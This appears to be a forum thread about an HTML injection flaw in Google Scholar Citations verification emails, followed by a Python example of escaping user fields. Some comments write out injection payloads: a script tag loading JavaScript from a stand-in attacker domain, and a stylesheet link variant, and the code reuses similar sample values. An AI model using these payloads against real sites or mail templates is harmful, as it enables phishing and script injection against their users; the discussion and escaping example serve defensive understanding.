
I agree on the subject line (which is "Verify your email address") and that the mail is sent from "Google Scholar Citations", but as it was possible to include arbitrary CSS files, the content could be changed to pretty much anything... Although there was a length restriction on the user's name, there were two other fields that weren't escaped properly and thus could be used to insert more HTML content.


>Although there was a length-restriction on the user's name

As long as any field allows enough chars to:

<script src="http://evilbadpersondomain.com/forTheLulz.js"></script>

...anything is possible from there.


There are email clients that execute JavaScript?


Ah, yeah, smartphone and desktop apps don't do JS (afaik) - but the web-browser access is still big. If Gmail's web interface went down for a day, I think a lot of people would notice.


Gmail doesn't run JavaScript in e-mails, though.


I am not sure - when you post enough JS code into a Gmail compose "window" it will crash.


My guess: the WYSIWYG editor uses its own HTML parser and filter, written in JavaScript, that has some O(n^terrible) corner case that your paste test is hitting.


I don't know of any email clients that execute JS inside mails. I don't think we will see such clients anytime soon.


Make that `<link rel=stylesheet href=http://ø.xx>` as JavaScript won't execute in recent mail clients.
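An added example (not code from this thread, and not Google Scholar's own code) of the output escaping that the first comment says was missing on two of the profile fields, and which also neutralises the `<link rel=stylesheet>` variant mentioned just above. The template, the field names and the sample field values are constructed for illustration; the check at the end lists every tag in the rendered mail body so you can see that, after escaping, only the template's own `<p>` elements remain, whatever the user typed.

```python
import html
import re

# Constructed sample input (not from the thread): values a user could place in
# free-text profile fields that get interpolated into an HTML notification mail.
SAMPLE_FIELDS = {
    "name": 'Alice <script src="http://example.invalid/x.js"></script>',
    "affiliation": "<link rel=stylesheet href=http://example.invalid/x.css>",
    "homepage": "https://example.invalid/alice",
}

# Hypothetical mail template; placeholders are filled from the user's fields.
TEMPLATE = (
    "<p>Hello {name} ({affiliation}),</p>\n"
    "<p>Please verify your email address. Profile: {homepage}</p>"
)

# Matches the start of any opening or closing tag and captures the element name.
_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def render_unescaped(fields):
    """The defective pattern: raw field values dropped straight into the template."""
    return TEMPLATE.format(**fields)


def escape_fields(fields):
    """Escape every user-supplied value (quotes included) before interpolation."""
    return {key: html.escape(str(value), quote=True) for key, value in fields.items()}


def render_escaped(fields):
    """The corrected pattern: only the template's own markup survives rendering."""
    return TEMPLATE.format(**escape_fields(fields))


def tag_names(html_body):
    """Sorted, de-duplicated element names of every tag found in html_body."""
    return sorted({m.group(1).lower() for m in _TAG_RE.finditer(html_body)})


def foreign_tags(html_body, allowed=("p",)):
    """Tags in the rendered body that the template itself does not emit.

    A non-empty result means user input was interpreted as markup, which is
    exactly the condition a template test should fail on.
    """
    return [name for name in tag_names(html_body) if name not in allowed]


if __name__ == "__main__":
    print("unescaped:", foreign_tags(render_unescaped(SAMPLE_FIELDS)))  # ['link', 'script']
    print("escaped:  ", foreign_tags(render_escaped(SAMPLE_FIELDS)))    # []
```

A length limit on one field, as the thread notes, is no substitute for this: the `<link>` payload fits comfortably in a name-sized field, and any field that reaches the template unescaped is enough. Escaping at the point of interpolation (rather than filtering on input) is what makes the rendered body independent of the field length.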

